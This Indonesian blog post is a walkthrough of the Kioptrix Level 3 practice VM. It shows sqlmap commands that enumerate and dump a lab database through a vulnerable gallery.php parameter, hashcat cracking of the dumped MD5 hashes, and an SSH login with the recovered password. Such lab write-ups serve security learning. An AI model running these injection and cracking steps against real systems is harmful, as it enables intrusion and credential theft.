Searching...
November 14, 2011
Monday, November 14, 2011

[KIOPTRIX LV 3] Attack User

Pada post sebelumnya mengenai [KIOPTRIX LV3] Gaining User Password membahas tentang mendapatkan password cpanel, sekarang saatnya mencari tau password user yang terdapat pada server.

Preparation:
1. SQLmap dapat di temukan di sini
2. Hashcat dapat ditemukan di sini

Briefing:
1. Mapping Local Area Network
2. Cari tau url halaman login
3. Gunakan Exploit-db untuk mencari vulnerability website tersebut
4. Lakukan serangan SQL injection dengan SQLmap
5. Crack hash MD5 dengan hashcat
6. Game Over

Walkthrough:Untuk step 1 - 3 bisa dilihat di [KIOPTRIX LV3] Gaining User Password

4. Lakukan serangan SQL injection dengan SQLmap

Setelah mengetahui kelemahan target, sekarang saatnya melakukan SQL injection. Untuk mempercepat proses SQL ijection, saya menggunakan tools SQLmap yang sudah tersedia di <<back|track 5.

Buka terminal, lalu ketik:

root@red-dragon:/pentest/exploits/exploitdb# cd /pentest/database/sqlmap/

Penggunaan SQLmap tergolong mudah, formatnya adalah

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u [vulnerable url]

Pada tahap 3 tiga sudah mengetahui letak vulnerable url korban kita terdapat pada /gallery.php?id=null. Maka kita hanya perlu menambahkan kioptrix3.com/gallery sebelum /gallery.php?id=null. Maka perintah sqlmap adalah:

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null

Pada SQL injection ini, saya akan mencoba membongkar database target. Maka perintah sqlmap adalah:

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null --dbs



Ada 3 database di sini:
gallery
information_schema
mysql
Saya akan menggunakan database gallery, dan mencoba mencari tau tabel apa saja yang ada pada database gallery. Maka perintah sqlmap adalah:

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery --table

Output:


Ada 7 tables di sini:
dev_accounts
gallarific_comments
gallarific_galleries
gallarific_photos
gallarific_settings
gallarific_stats
gallarific_users
Saya akan menggunakan database gallery, dan mencoba mencari tau column apa saja yang ada pada database gallery dan tabel dev_accounts. Maka perintah sqlmap adalah:

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery -T dev_accounts --column


ada 3 columns di sini:
id
password
username

Selanjutnya, dumping bagian ini dengan perintah
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery -T dev_accounts --dump



Jika ditanyakan untuk cracking hash dengan dictionary, sebaiknya imput perintah 'n' untuk menolak. Karena dictionary attack yang terdapat pada direktory sqlmap kurang lengkap. Kita akan menggunakan hashcat untuk cracking hash md5 yang satu ini.

5. Crack hash MD5 dengan hashcat

Buka terminal lalu masukan perintah:
root@red-dragon:~# echo -i "0d3eccfb887aabd50f243b3f155c0f85\n5badcaf789d3d1d09794d8f021f40f0e" > /root/hashes

kemudian masuk ke direktori hashcat dengan perintah

root@red-dragon:~# cd /pentest/passwords/hashcat/

Crack hash MD5 dengan hashcat dengan perintah:

root@red-dragon:/pentest/passwords/hashcat# ./hashcat-cli32.bin /root/hashes /root/red-dragon-wordlist.txt 

note/root/red-dragon-wordlist.txt harus sesuai dengan direktori dictionary anda.

Output:


Uji keberhasilan hashcat dalam memecahkan hash MD5 dengan melakukan koneksi SSH pada target dengan perintah:

root@red-dragon:~# ssh loneferret@kioptrix3.com

Ketika ditanyakan password, masukan "starwars" (tanpa tanda petik -> password ini sesuai dengan hasil crack dari hashcat)


Berhasil =)

Created by:
red-dragon










Supported by:
Blue Dragon

0 comment:

Post a Comment

 
Back to top!